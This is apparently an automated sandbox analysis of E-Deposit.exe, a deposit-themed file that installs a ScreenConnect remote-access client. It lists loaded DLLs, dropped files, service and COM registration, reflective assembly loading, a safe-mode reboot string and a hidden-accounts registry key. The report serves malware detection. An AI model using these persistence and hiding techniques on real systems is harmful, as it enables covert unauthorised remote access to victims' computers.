                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: E-Deposit.exeStatic PE information: certificate valid
                                  Source: E-Deposit.exeStatic file information: File size 5627248 > 1048576
                                  Source: E-Deposit.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: E-Deposit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.pdbl|r source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: E-Deposit.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519460031.0000000002800000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519662167.0000000002952000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1708388417.0000000000F5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1692192902.0000000004100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: E-Deposit.exe, 59d35d.rbs.2.dr, MSID57F.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSID590.tmp.2.dr, 59d35c.msi.2.dr, MSID7B3.tmp.2.dr, 59d35e.msi.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: E-Deposit.exe, MSICCC5.tmp.1.dr, ScreenConnect.ClientSetup.msi.0.dr, 59d35c.msi.2.dr, 59d35e.msi.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbf source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: E-Deposit.exe
                                  Source: E-Deposit.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: E-Deposit.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: E-Deposit.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: E-Deposit.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: E-Deposit.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  Source: 0.2.E-Deposit.exe.3370000.0.raw.unpack, Program.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.0.E-Deposit.exe.10178ec.5.raw.unpack, Program.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: ScreenConnect.Client.dll.2.dr Static PE information: 0x94F102E7 [Mon Mar 8 13:28:07 2049 UTC]
                                  Source: MSICCC5.tmp.1.dr Static PE information: real checksum: 0x2f213 should be: 0x1125d0
                                  Source: E-Deposit.exe Static PE information: real checksum: 0x54d1c1 should be: 0x55f625
                                  Source: C:\Users\user\Desktop\E-Deposit.exe Code function: 0_2_01784BE0 pushfd ; ret 0_2_01784BEA
                                  Source: C:\Users\user\Desktop\E-Deposit.exe Code function: 0_2_017870BB push eax; mov dword ptr [esp], ecx 0_2_017870C1
                                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_3_043B8462 push es; ret 4_3_043B8470
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Code function: 7_2_05CBBAE0 push esp; iretd 7_2_05CBBAE1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B6322ED push ebx; retf 8_2_00007FFD9B6322FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B6309D8 push ebx; retf 8_2_00007FFD9B63098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe Code function: 8_2_00007FFD9B63096D push ebx; retf 8_2_00007FFD9B63098A

                                  Persistence and Installation Behavior

                                  Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dll COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dll
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.InstallerActions.dll
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe
                                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Core.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.dll
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll
                                  Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp
                                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID590.tmp
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll
                                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID7B3.tmp
                                  Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.Cab.dll
                                  Source: ScreenConnect.ClientService.dll.2.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)

                                  Hooking and other Techniques for Hiding and Protection

                                  Source: E-Deposit.exe, 00000000.00000002.1698037644.0000000005A70000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: E-Deposit.exe, 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000004.00000003.1683493567.000000000427B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
